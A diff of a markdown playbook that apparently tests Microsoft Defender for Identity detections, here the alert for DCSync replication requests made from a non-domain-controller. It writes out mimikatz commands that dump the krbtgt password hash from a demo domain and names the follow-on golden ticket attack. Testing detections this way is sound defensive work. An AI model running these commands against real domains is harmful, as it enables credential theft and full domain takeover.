DanielpFR/MDI/MDI_Playbook_Sample.md

 If an attacker has the "DS-Replication-Get-Changes-All" permission for example, he can initiate a replication request to retrieve the data stored in Active Directory such as the krbtgt's password hash.
 In this detection, an alert is triggered when a replication request is initiated from a computer that isn't a DC.

-From a command line run :
+From a command line run with a least local admin account :

 *mimikatz # privilege::debug*
 *mimikatz # lsadump::dcsync /domain:msdemo.local /user:krbtgt*  => to retrieve the krbtgt's password hash and move to a golden ticket attack